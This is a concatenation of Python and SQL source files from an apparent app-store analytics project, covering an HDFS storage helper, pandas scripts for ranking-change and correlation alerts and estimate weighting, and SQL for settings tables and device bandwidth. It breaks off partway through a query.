def make_dir(path):
s, o = commands.getstatusoutput('hadoop fs -mkdir %s' % path)
return True if s == 0 else False
@staticmethod
def read_file(file):
cat = subprocess.Popen(["hadoop", "fs", "-cat", file], stdout=subprocess.PIPE)
return cat.stdout
@staticmethod
def read_compressed_file(file):
cat = subprocess.Popen(["hadoop", "fs", "-text", file], stdout=subprocess.PIPE)
return cat.stdout
@staticmethod
def is_existed(path):
s, o = commands.getstatusoutput('hadoop fs -test -e %s' % path)
return True if s == 0 else False
@staticmethod
def delete(path, skip_trash=True):
skip_str = ''
if skip_trash:
skip_str = '-skipTrash'
status, output = commands.getstatusoutput('hadoop fs -rm -r -f %s %s' % (skip_str, path))
if status != 0:
raise Exception(output)
@staticmethod
def list(path):
s, o = commands.getstatusoutput('hadoop fs -ls %s | grep %s | awk \'{print $NF}\'' % (
path, path
))
return o.split('\n')
@staticmethod
def size(path):
s, o = commands.getstatusoutput(
'hadoop fs -du %s | awk \'BEGIN{s=0}{s+=$1}END{print s}\'' % path
)
return int(o.strip())
@staticmethod
def move(from_path, to_path):
s, o = commands.getstatusoutput('hadoop fs -mv %s %s' % (
from_path, to_path
))
if s != 0:
raise Exception(o)
@staticmethod
def copy(from_path, to_path):
s, o = commands.getstatusoutput('hadoop fs -cp %s %s' % (
from_path, to_path
))
if s != 0:
raise Exception(o)
@staticmethod
def touchz(file):
s, o = commands.getstatusoutput('hadoop fs -touchz %s' % file)
if s != 0:
raise Exception(o)
@staticmethod
def write(file, content):
HDFSStorage.delete(file)
p = subprocess.Popen(
['hadoop', 'fs', '-put', '-', file],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT
)
p.communicate(input=content)<file_sep>/ranking_change/correlations_kpi.py
'''
Created on Aug 16, 2013
@author: perezrafael
'''
import pandas as pd
import matplotlib.pyplot as plt
import datetime as dt
import matplotlib.dates as mdates
import matplotlib.cm as cm
import config
def make_human_readable(df):
df['Country'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['store_id']
df['Category'] = df['category_id'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
del df['category_id']
df['Type'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
df['Market'] = df['feed_id'].apply(lambda x: config.IOS_MARKETS_DICT[x])
del df['feed_id']
return df
def generate_kpi(df):
dfs = df.groupby(['store_id', 'category_id', 'feed_id', 'value_type', 'rank_limit'])
result = []
for n, g in dfs:
g = g.groupby('date').mean().reset_index()
g['prev_day_corr_rolling_avg'] = pd.stats.moments.rolling_mean(g['corr'].shift(),7)
g['corr_rolling_diff'] = g['corr'] - g['prev_day_corr_rolling_avg']
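        # alert threshold: trailing 7-day mean of the day-over-day correlation
        # change plus three standard deviations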
g['corr_alert'] = pd.stats.moments.rolling_mean(g['corr_rolling_diff'].shift(),7) + (pd.stats.moments.rolling_std(g['corr_rolling_diff'].shift(),7)*3.0)
g['store_id'] = n[0]
g['category_id'] = n[1]
g['feed_id'] = n[2]
g['value_type'] = n[3]
result.append(g)
result = pd.concat(result)
return result
def main():
fn = 'corr_2013-08-19'
df = pd.read_csv('data/corr/%s.csv'%fn)
df = df[df['rank_transform_name']=='log']
del df['rank_transform_name']
df = df[df['value_transform_name']=='log']
del df['value_transform_name']
kpi = generate_kpi(df)
kpi = make_human_readable(kpi)
kpi.to_csv('data/corr/%s_kpi.csv'%fn, index=False)
alerts = kpi[kpi['corr_rolling_diff'] > kpi['corr_alert']]
alerts.to_csv('data/corr/%s_alerts.csv'%fn, index=False)
if __name__ == '__main__':
main()<file_sep>/exact-matching-improvement/lib/feature_factory.py
__author__ = 'jjanssen'
import temp_database as td
from lib import features_aa
from lib import features_aa_improved
from lib import feature_company
cleaner = features_aa.Cleaner()
def aa_baseline_row(row):
    name = row['app_name']
    return cleaner.clean_app_name(name)
def _load_features(market=None):
    """Return the feature table for one market, or for all markets when market is None."""
    if market == 'android':
        return td.generate_android_features()
    if market == 'ios':
        return td.generate_ios_features()
    if market is None:
        return td.generate_all_features()
    return None
def generate_aa_baseline(market=None):
    features = _load_features(market)
    features['aa_baseline'] = features.apply(aa_baseline_row, axis=1).reset_index(drop=True)
    return features.drop(labels='app_name', axis=1)
def generate_aa_improved(market=None):
    features = _load_features(market)
    return features.apply(features_aa_improved.clean_appname_row, axis=1).reset_index(drop=True)
def generate_aa_improved_v2(market=None):
    features = _load_features(market)
    return features.apply(features_aa_improved.clean_appname_row_v2, axis=1).reset_index(drop=True)
def generate_improved_unicode(market=None):
    features = _load_features(market)
    return features.apply(features_aa_improved.clean_per_unicode_category, axis=1).reset_index(drop=True)
def generate_cleaned_company(market=None):
    features = _load_features(market)
    features = features.apply(feature_company.clean_company, axis=1).reset_index(drop=True)
return features<file_sep>/tooling/DistimoClients/setup.py
from setuptools import setup
setup(
name='DistimoClients',
version='1.0.0',
author='<NAME>',
author_email='<EMAIL>',
packages=['distimo_clients'],
description='Distimo MoneyMaker and Database clients',
install_requires=[
"numpy >= 1.8.0",
"pandas >= 0.14.0",
"paramiko >= 1.14.0",
"mysql-connector-python >= 1.2.2",
"naturalsort == 1.0.3",
"configparser >= 3.0.0"
],
)
<file_sep>/weekly_weights/apply_weights.py
'''
Created on May 29, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
from datetime import datetime
import sys
def load_estimates(path):
df = pd.DataFrame()
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('.csv'):
df = df.append(pd.read_csv(os.sep.join([dirpath, filename])))
return df
def load_ranks(path):
df = pd.DataFrame()
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('.csv'):
fdata = filename.split('_')
df1 = pd.read_csv(os.sep.join([dirpath, filename]))
df1['store_id'] = np.int64(fdata[0])
df = df.append(df1)
return df
def append_weekdays(df):
''' Check each weekday for each date and append it
'''
dates = df[['date']].drop_duplicates()
if isinstance(dates['date'][:1][0], str):
dates['date_b'] = dates['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
dates['weekday'] = dates['date_b'].apply(lambda x: x.weekday())
dates = dates.drop('date_b', axis=1)
else:
dates['weekday'] = dates['date'].apply(lambda x: x.weekday())
df = df.merge(dates, on='date')
return df
if __name__ == '__main__':
platform = 'android'
month = '2013-01'
#platform = sys.argv[1]
#month = sys.argv[2]
appannie_dir = '/Users/perezrafael/appannie'
preview_weights_path = '%s/data_science/weekly_weights/data/preview_weights_%s.csv'%(appannie_dir, platform)
dynamic_weights_path = '%s/data_science/weekly_weights/data/weights_%s_2012-12-30_2013-03-08.csv'%(appannie_dir, platform)
ranks_path = '%s/data_science/evaluation/data/%s/%s/est_daily_raw'%(appannie_dir, platform, month)
estimates_path = '%s/data/webui_estimates_b/%s/%s'%(appannie_dir, platform, month)
original_est_path = "%s/data_science/evaluation/data/%s_webui_original/%s/est_daily_raw"%(appannie_dir, platform, month)
preview_est_path = "%s/data_science/evaluation/data/%s_webui_preview/%s/est_daily_raw"%(appannie_dir, platform, month)
dynamic_est_path = "%s/data_science/evaluation/data/%s_webui_dynamic/%s/est_daily_raw"%(appannie_dir, platform, month)
unit = pd.DataFrame({'feed_id': [0,1,2,100,101,102],'unit':['downloads', 'downloads', 'usd', 'downloads', 'downloads', 'usd']})
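    # the mapping above: feed_ids 0/1 and 100/101 are download feeds; 2 and 102 are revenue (USD) feeds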
dynamic_weights = pd.read_csv(dynamic_weights_path)[['unit', 'store_id', 'date', 'weight']].drop_duplicates()
preview_weights = pd.read_csv(preview_weights_path)[['unit', 'store_id', 'weekday', 'weight']].drop_duplicates()
ranks = load_ranks(ranks_path)[['store_id', 'category_id', 'rank', 'app_id', 'date', 'feed_id']].drop_duplicates()
#ranks = ranks[ranks['app_id']==529479190]
#ranks = ranks[ranks['category_id']==6014]
#ranks = ranks[ranks['feed_id']==102]
#ranks = ranks[ranks['store_id']==143441]
estimates = load_estimates(estimates_path)
if 'class' in estimates.columns:
estimates.rename(columns={'class':'app_id'}, inplace=True)
estimates = estimates.merge(ranks, on=['store_id', 'category_id', 'app_id', 'date', 'feed_id'])
ranks = None
estimates = estimates.merge(unit, on=['feed_id'])
estimates = estimates.merge(dynamic_weights, on=['unit', 'store_id', 'date'])
estimates['dynamic_estimate'] = estimates['estimate']*estimates['weight']
estimates = estimates.drop('weight', axis=1)
estimates = append_weekdays(estimates)
estimates = estimates.merge(preview_weights, on=['unit', 'store_id', 'weekday'])
estimates['preview_estimate'] = estimates['estimate']*estimates['weight']
estimates = estimates[['store_id', 'category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'dynamic_estimate', 'preview_estimate']].drop_duplicates()
start_date = estimates['date'].min()
end_date = estimates['date'].max()
estimates = estimates.groupby(['store_id', 'feed_id'])
for n, g in estimates:
#143465_1_2013-02-01--2013-02-28.csv
filename = '%s_%s_%s--%s.csv'%(n[0], n[1], start_date, end_date)
g = g.drop('store_id', axis=1)
g[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id']].to_csv('%s/%s'%(original_est_path, filename),index=False)
g = g.drop('estimate', axis=1)
g.rename(columns={'dynamic_estimate':'estimate'}, inplace=True)
g[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id']].to_csv('%s/%s'%(dynamic_est_path, filename),index=False)
g = g.drop('estimate', axis=1)
g.rename(columns={'preview_estimate':'estimate'}, inplace=True)
g[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id']].to_csv('%s/%s'%(preview_est_path, filename),index=False)
print filename
<file_sep>/ranking_change/read_rank_files.py
'''
Created on Aug 14, 2013
@author: perezrafael
'''
import sys
import os
import pandas as pd
import zipfile
import StringIO
import matplotlib.pyplot as plt
import datetime as dt
import matplotlib.dates as mdates
import psycopg2
import matplotlib.cm as cm
import numpy as np
from itertools import cycle
import bz2
import datetime
import config
import gc
UNCOMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks/special' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(UNCOMPRESSED_RANKING_FILES_PATH):
print 'Expecting uncompressed ranking files in directory %s' % UNCOMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
def load_ranks_csv_zip(path):
filehandle = open(path, 'rb')
zfile = zipfile.ZipFile(filehandle)
data = StringIO.StringIO(zfile.read(zfile.namelist()[0])) #don't forget this line!
df = pd.read_csv(data)
return df
def load_ranks_file(path, country_names=None, ranking_category_str_filter=None):
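    # Each line of a ranking_YYYY-MM-DD.sql dump is expected to look like:
    #   <date>\t<store_id>\t<category_id>\t<market_id>\t<space-separated app ids>\n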
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql')
filename_date_str = filename[len('ranking_'):-len('.sql')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_market_str_filter = frozenset(map(str, config.IOS_MARKETS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.IOS_CATEGORIES_DICT.keys()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
if country_names is not None:
ranking_store_str_filter = []
for k, v in config.IOS_STORES_DICT.iteritems():
if v in country_names:
ranking_store_str_filter.append(str(k))
assert len(ranking_store_str_filter)
ranking_store_str_filter = frozenset(ranking_store_str_filter)
else:
ranking_store_str_filter = frozenset(map(str, config.IOS_STORES_DICT.keys()))
del country_names
f = open(path, 'r' )
dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_market_str, ranking_list_str_unsplit = line_split
if ranking_store_str not in ranking_store_str_filter:
continue
if ranking_market_str not in ranking_market_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
country_name = ranking_store_str
category = ranking_category_str
market = ranking_market_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'App ID', 'index':'Rank'}, inplace=True)
df['Rank'] += 1
df['Date'] = ranking_date_str
df['Country'] = country_name
df['Category'] = category
df['Market'] = market
dfs.append(df)
f.close()
dfs = pd.concat(dfs)
dfs['Category'] = dfs['Category'].apply(lambda ranking_category_str: config.IOS_CATEGORIES_DICT[int(ranking_category_str)])
dfs['Type'] = dfs['Market'].apply(lambda ranking_market_str: config.IOS_TYPES_DICT[int(ranking_market_str)])
dfs['Market'] = dfs['Market'].apply(lambda ranking_market_str: config.IOS_MARKETS_DICT[int(ranking_market_str)])
dfs['Country'] = dfs['Country'].apply(lambda ranking_store_str: config.IOS_STORES_DICT[int(ranking_store_str)])
return dfs
def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + datetime.timedelta(n)
def add_f_date(df):
df2 = df[['Date']].drop_duplicates()
df2['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df2['Date']]
df = df.merge(df2, on='Date')
return df
def plot_multi_category_rank_shift(df, which='rel', name='overall'):
gdf = df.groupby(['Country', 'Market', 'Type'])
for n,g in gdf:
plt.clf()
#fig = plt.figure()
fig = plt.figure(figsize=(int(len(g['Date'].drop_duplicates())/2),12))
ax = fig.add_subplot(111)
ax.set_position([0.1,0.1,0.5,0.8])
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
g = g.groupby(['Category', 'f_date']).mean().reset_index()
gdf2 = g.groupby(['Category'])
p = []
categories = []
lines = ["-","--","-.",":"]
linecycler = cycle(lines)
colors = iter(cm.rainbow(np.linspace(0, 1, len(gdf2))))
max_rank_shift = 0
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['%s_rank_shift'%which], next(linecycler), linewidth=3, color=next(colors))
p.append(pa)
categories.append(n2)
if g2['%s_rank_shift'%which].max()>max_rank_shift:
max_rank_shift = g2['%s_rank_shift'%which].max()
plt.gcf().autofmt_xdate()
ax.grid()
if which=='rel':
plt.ylim(0,1)
elif which=='abs':
plt.ylim(0, max_rank_shift*1.1)
handles, labels = ax.get_legend_handles_labels()
lgd = ax.legend(p, categories, loc='center left', bbox_to_anchor=(1, 0.5))
plt.title(str(n))
fig.savefig('plots/rel_rank_change_all/%s_rank_change_%s_%s.png'%(which, name, '_'.join(n)), bbox_extra_artists=(lgd,), bbox_inches='tight')
#plt.show()
def plot_rank_shift(df, which='rel'):
gdf = df.groupby(['Country', 'Market', 'Type', 'Category'])
for n,g in gdf:
plt.clf()
#fig = plt.figure()
fig = plt.figure(figsize=(int(len(g['Date'].drop_duplicates())/2),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
g = g.groupby(['f_date']).mean().reset_index()
plt.plot(g['f_date'].values, g['%s_rank_shift'%which], linewidth=3, )
plt.gcf().autofmt_xdate()
ax.grid()
if which=='rel':
plt.ylim(0,1)
elif which=='abs':
plt.ylim(0, g['%s_rank_shift'%which].max()*1.1)
plt.title(str(n))
plt.savefig('plots/rel_rank_change/%s_rank_change_%s.png'%(which, '_'.join(n)))
#plt.show()
def get_rank_shift(df):
all_stats = []
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
for n,g in dfs:
gdf2 = g.groupby('App ID')
rank_shifts=[]
for n2,g2 in gdf2:
g2['abs_rank_shift'] = (g2['Rank']-g2['Rank'].shift()).abs()
g2['rel_rank_shift'] = (g2['abs_rank_shift']*1.0)/g2['Rank'].shift()
rank_shifts.append(g2)
rank_shifts = pd.concat(rank_shifts)
all_stats.append(rank_shifts)
#rank_shifts.to_csv('%s.csv'%'_'.join(n), index=False)
all_stats = pd.concat(all_stats)
return all_stats
def plot_ranks(df, top=25):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
for n,g in dfs:
plt.clf()
        fig = plt.figure(figsize=(40,12))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
gdf2 = g.groupby('App ID')
for n2,g2 in gdf2:
if g2['Rank'].quantile(0.75)<=20:
app_name = g2['App Name'].values[0]
plt.plot(g2['f_date'].values, g2['Rank'], '-')
plt.text(g2['f_date'].values.max(), g2[g2['f_date']==g2['f_date'].max()]['Rank'].max(), app_name)
plt.gcf().autofmt_xdate()
plt.gca().invert_yaxis()
ax.grid()
plt.ylim(top*2, 0)
plt.title(str(n))
plt.savefig('plots/top%s_%s.png'%(top, '_'.join(n)))
#plt.show()
def get_free_paid_ratio(df):
    # TODO: unfinished stub -- groups the rankings but never computes or
    # returns a free/paid ratio.
    dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
def analyze_rank_shift(df, which='rel'):
dfs = df.groupby(['Country', 'Category', 'Market', 'Type'])
result = []
for n, g in dfs:
g = g.groupby('Date').mean().reset_index()
g['prev_day_%s_rank_shift_rolling_avg'%which] = pd.stats.moments.rolling_mean(g['%s_rank_shift'%which].shift(),7)
g['%s_rank_shift_rolling_diff'%which] = g['%s_rank_shift'%which] - g['prev_day_%s_rank_shift_rolling_avg'%which]
g['%s_rank_shift_alert'%which] = pd.stats.moments.rolling_mean(g['%s_rank_shift_rolling_diff'%which].shift(),7) + (pd.stats.moments.rolling_std(g['%s_rank_shift_rolling_diff'%which].shift(),7)*3.0)
g['Country'] = n[0]
g['Category'] = n[1]
g['Market'] = n[2]
g['Type'] = n[3]
result.append(g)
result = pd.concat(result)
return result
def main():
path = UNCOMPRESSED_RANKING_FILES_PATH
overall_categories = ['Overall',
'Games',
'Business',
'Weather',
'Utilities',
'Travel',
'Sports',
'Social Networking',
'Reference',
'Productivity',
'Photo and Video',
'News',
'Navigation',
'Music',
'Lifestyle',
'Health and Fitness',
'Finance',
'Entertainment',
'Education',
'Books',
'Medical',
'Newsstand',
'Food and Drink']
games_categories = ['Overall',
'Games',
'Action',
'Adventure',
'Arcade',
'Board',
'Card',
'Casino',
'Dice',
'Educational',
'Family',
'Kids',
'Music',
'Puzzle',
'Racing',
'Role Playing',
'Simulation',
'Sports',
'Strategy',
'Trivia',
'Word']
country_names = [#'United States',
#'United Kingdom',
#'Canada',
#'Japan',
#'China',
#'Russia',
#'Australia',
'Germany',
'France',
'Italy']
#country_names = ['Italy']
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 13)
    alerts = []
for country_name in country_names:
gc.collect()
dfs = []
print country_name
for single_date in daterange(start_date, end_date):
            rank_file = '%s/ranking_%s.sql'%(path, single_date.strftime('%Y-%m-%d'))
            print 'loading %s'%rank_file
            df = load_ranks_file(rank_file, [country_name])
dfs.append(df)
dfs = pd.concat(dfs)
dfs = add_f_date(dfs)
dfs = get_rank_shift(dfs)
dfs.to_csv('data/ranks/all_stats_%s.csv'%country_name, index=False)
stats = analyze_rank_shift(dfs)
stats.to_csv('data/ranks/%s_analysis.csv'%country_name, index=False)
alert = stats[stats['rel_rank_shift_rolling_diff'].abs()>stats['rel_rank_shift_alert']]
alert.to_csv('data/ranks/%s_rank_change_alerts.csv'%country_name, index=False)
alerts.append(alert)
#plot_rank_shift(dfs, 'rel')
plot_multi_category_rank_shift(dfs[dfs['Category'].isin(overall_categories)],'rel', 'overall')
plot_multi_category_rank_shift(dfs[dfs['Category'].isin(games_categories)],'rel', 'games')
alerts = pd.concat(alerts)
alerts.to_csv('data/all_rank_change_alerts.csv', index=False)
if __name__ == '__main__':
main()
<file_sep>/ranking_change/test_scales.py
'''
Created on Aug 27, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
def get_business_model_correlation(df):
r = None
first_pass = True
for n, g in df.groupby(['business_model']):
business_model = n
g = g.rename(columns={'scale':business_model})
del g['business_model']
if first_pass:
r = g.copy()
else:
r = r.merge(g, on=['Country', 'Category' , 'Market', 'Type', 'rank_range', 'Date'], how='outer')
first_pass = False
r = r.fillna(1.0)
business_models = df['business_model'].drop_duplicates()
#for n1 in business_models:
# for n2 in business_models:
# if n1==n2:
# continue
# r['diff_%s_%s'%(n1,n2)] = (r[n1] - r[n2]).abs()
    r.corr().to_csv('data/scales/scales_corr.csv')  # keep the index so correlation rows stay labeled
r['diff Freemium + Subs -- Freemium'] = (r['Freemium + Subs'] - r['Freemium']).abs()
r['diff Paymium + Subs -- Paymium'] = (r['Paymium + Subs'] - r['Paymium']).abs()
r = r.sort(['Country', 'Category' , 'Market', 'Type', 'rank_range'], ascending=True)
r.to_csv('data/scales/scales_diff.csv', index=False)
def get_business_model_autocorr(df):
r = []
df = df.sort(['Country', 'Category' , 'Market', 'Type', 'rank_range', 'Date'], ascending=True)
for n, g in df.groupby(['Country', 'Category' , 'Market', 'Type', 'rank_range','business_model']):
shift = []
corr = []
business_model = n[5]
for i in np.arange(g.shape[0]):
shift.append(i)
corr.append(g['scale'].corr(g['scale'].shift(i)))
g['shift'] = shift
g['corr'] = corr
r.append(g)
r = pd.concat(r)
r = r[['Country', 'Category' , 'Market', 'Type', 'rank_range','business_model', 'shift', 'corr']].drop_duplicates()
r.to_csv('data/scales/scales_autocorr.csv', index=False)
def main():
file = 'data/scales/scales.csv'
df = pd.read_csv(file)
df = df[df['Date']>'2013-08-08']
#get_business_model_correlation(df)
get_business_model_autocorr(df)
if __name__ == '__main__':
main()<file_sep>/evaluation/py/log_to_csv.py
"""
Collect the quality measure results into pandas DataFrame, and output to CSV.
An example of log file:
143441_Downloads_2012-07-01--2012-07-31.csv
--------
(Top 200) % of analytics apps over 20% error: 0.305000
(Top 200) % of analytics apps over 10% and 100.00 units error: 0.550000
143441_USD_2012-07-01--2012-07-31.csv
--------
(Top 200) % of analytics apps over 20% error: 0.230000
(Top 200) % of analytics apps over 10% and 100.00 units error: 0.525000
"""
# Author: <NAME> <<EMAIL>>
import sys
import os.path
import itertools
import re
import pandas as pd
import operator
from optparse import OptionParser
from internal import stores_dict
def main():
opts, args = parse_options()
log_filename = args[0]
output_csv = args[1]
f = file(log_filename, 'r')
lines = f.readlines()
# Groups are separated by empty lines.
groupby = itertools.groupby(lines, lambda s: s != '\n')
groups = [list(g[1]) for g in groupby if g[0]]
platform = opts.platform.split('_')[0].lower()
pairs = map(lambda g: _generate_name_and_series_pair_from_group(g, platform), groups)
# The pairs are: [(name1, pd.Series), (name2, pd.Series), ...]
df = pd.DataFrame.from_items(pairs)
df.T.to_csv(output_csv, index=False)
def parse_options():
parser = OptionParser()
parser.add_option("-p", "--platform", dest="platform",
help="Required. The platform you want to get.")
(opts, args) = parser.parse_args()
try:
return (opts, args)
except Exception:
print(parser.print_help())
def _generate_name_and_series_pair_from_group(g, platform):
name = g[0].strip()
content = g[2:]
content_series = _content_to_series(content)
return (name, _add_meta_info(content_series, name, platform))
def _content_to_series(s):
"""['xxx: num1'
'yyy: num2'
...]
->
pd.Series with index=[xxx, yyy, ...] and values=[num1, num2, ...]
"""
pattern = re.compile(r'(.*): (.*)')
index = []
values = []
def collect_index_and_values(s):
m = pattern.match(s.strip())
key = m.group(1)
value = m.group(2)
index.append(key)
values.append(value)
map(collect_index_and_values, s)
return pd.Series(values, index=index)
def _add_meta_info(s, name, platform):
country, unit, period = name.split('_')
    country_dict = getattr(stores_dict, platform)['country_dict']
    country = country_dict[int(country)]
s = s.append(pd.Series([country], index=['country']))
s = s.append(pd.Series([unit], index=['unit']))
s = s.append(pd.Series([period.split('.')[0]], index=['period']))
return s
if __name__ == '__main__':
main()
<file_sep>/customers-also-bought/lib/customer_scrapers/customer_scrapers/items.py
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class CustomerScrapersItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
country_external_id = scrapy.Field()
external_id = scrapy.Field()
price = scrapy.Field()
genre_names = scrapy.Field()
cab_external_id = scrapy.Field()
cab_rank = scrapy.Field()
app_name = scrapy.Field()
has_in_app_purchases = scrapy.Field()
<file_sep>/int-vs-m-benchmark/sql/ios/1000a5-initialize-settings_tables.sql
/*
DESCRIPTION : create working tables
INPUT TABLE(S) : generic.exchange_rates, generic.currencies,
appstore.currencies, appstore.countries, appstore.applications
appstore.appstore_instances, appstore.rankcategories, appstore.categories
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.settings_countries
temp.settings_excluded_apps
temp.settings_day_weights
temp.settings_exchange_rates
temp.settings_appstore_instances
temp.settings_rankcategories
QUERY STEPS : 1. create temporary tables for countries, day weights, exchange rates, appstore_instances, rankcategories rankings
*/
-- COUNTRIES --
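-- normalize the list: upper-case, strip spaces, then collapse separators to single commas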
SET @countries = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries,'temp.countries_temp','VARCHAR(6)');
DROP TEMPORARY TABLE IF EXISTS temp.settings_countries;
CREATE TEMPORARY TABLE temp.settings_countries (
iso_code VARCHAR(2),
country_id smallint(5) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (iso_code))
AS
SELECT
iso_code,cn.id as country_id
FROM appstore.countries cn
JOIN temp.countries_temp t ON t.element = cn.iso_code
;
-- EXCLUDED_APPLICATIONS --
SET @exclude_application_ids = REPLACE(TRIM(REPLACE(REPLACE(@exclude_application_ids,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@exclude_application_ids,'temp.excluded_applications_temp','INT');
DROP TEMPORARY TABLE IF EXISTS temp.settings_excluded_apps;
CREATE TEMPORARY TABLE temp.settings_excluded_apps
(application_id INT unsigned NOT NULL PRIMARY KEY)
AS
SELECT a.id AS application_id
FROM appstore.applications a
JOIN temp.excluded_applications_temp t ON (t.element = a.id OR t.element = a.parent_id)
;
-- DOWNLOAD DAY WEIGHTS --
SET @day_weights = REPLACE(TRIM(REPLACE(REPLACE(@day_weights,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@day_weights,'temp.day_weights_temp','DECIMAL(4,3)');
DROP TEMPORARY TABLE IF EXISTS temp.settings_day_weights;
CREATE TEMPORARY TABLE temp.settings_day_weights(
date date,
weight DECIMAL(4,3),
CONSTRAINT PRIMARY KEY (date)
) AS
SELECT
DATE(DATE_SUB(@date,INTERVAL id - 1 day)) as date,
element as weight
FROM temp.day_weights_temp
;
-- EXCHANGE RATES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_exchange_rates;
CREATE TEMPORARY TABLE temp.settings_exchange_rates (
id smallint(11) unsigned,
rate decimal(12,6),
CONSTRAINT PRIMARY KEY (id)
) AS
SELECT
cr.id,
gc_foreign.code,
er.rate
FROM generic.exchange_rates er
JOIN generic.currencies gc_base ON gc_base.id = er.currency_id
JOIN generic.currencies gc_foreign ON gc_foreign.id = er.foreign_currency_id
/* look up specific store currency id's, since these may differ cross store */
JOIN appstore.currencies cr ON cr.code = gc_foreign.code
-- the number of days in this table is dependent on which ranking dates and dates from downloads table is used
WHERE er.date = DATE_SUB(@date,INTERVAL 1 day)
AND gc_base.code = 'USD'
;
-- APPSTORE INSTANCES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_appstore_instances;
CREATE TEMPORARY TABLE temp.settings_appstore_instances(
appstore_instance_id SMALLINT(5) UNSIGNED NOT NULL,
country_id smallint(5) unsigned NOT NULL,
device_id TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (appstore_instance_id)
)
AS
SELECT
ai.id AS appstore_instance_id,
ai.country_id,
ai.device_id
FROM appstore.appstore_instances ai
JOIN appstore.countries cn ON cn.id = ai.country_id
JOIN temp.settings_countries cs ON cs.iso_code = cn.iso_code
;
-- RANKCATEGORIES RANKINGS --
DROP TEMPORARY TABLE IF EXISTS temp.settings_rankcategories;
CREATE TEMPORARY TABLE temp.settings_rankcategories(
`rankcategory_id` SMALLINT(5) UNSIGNED NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
`category_id` SMALLINT(5) UNSIGNED NOT NULL,
CONSTRAINT PRIMARY KEY (rankcategory_id)
)
AS
SELECT
rc.id AS rankcategory_id,
rc.type,
rc.category_id
FROM appstore.rankcategories rc
JOIN appstore.categories c ON c.id = rc.category_id
WHERE rc.type IN ('free','paid','gross');
<file_sep>/aa_au_model/heavy_usage/sql/get_mdm_bandwidth.sql
-- Get bandwidth per device for iOS on MDM
-- Note: should be run on Redshift EDW
-- MONTHLY
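-- 1073741824 bytes = 1024^3 = 1 GiB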
select
guid_key,
max(dgm.platform) as platform,
max(dgm.device_type_snapshot) as device_type,
coalesce(sum(fam.domestic_mobile_bytes) / 1073741824, 0) as domestic_mobile_gb,
coalesce(sum(fam.roaming_mobile_bytes) / 1073741824, 0) as roaming_mobile_gb,
coalesce(sum(fam.domestic_wifi_bytes) / 1073741824, 0) as domestic_wifi_gb,
coalesce(sum(fam.roaming_wifi_bytes) / 1073741824, 0) as roaming_wifi_gb,
(
coalesce(sum(fam.domestic_mobile_bytes), 0) +
coalesce(sum(fam.roaming_mobile_bytes), 0) +
coalesce(sum(fam.domestic_wifi_bytes), 0) +
coalesce(sum(fam.roaming_wifi_bytes), 0)
) / 1073741824 as total_gb
from
edw.fact_app_monthly fam
join edw.dim_guid_monthly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150601
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and fam.reported_data_usage
and dgm.days_with_records >= 20
group by
utc_date_key,
guid_key
order by
total_gb desc
;
-- WEEKLY
select
guid_key,
max(dgm.platform) as platform,
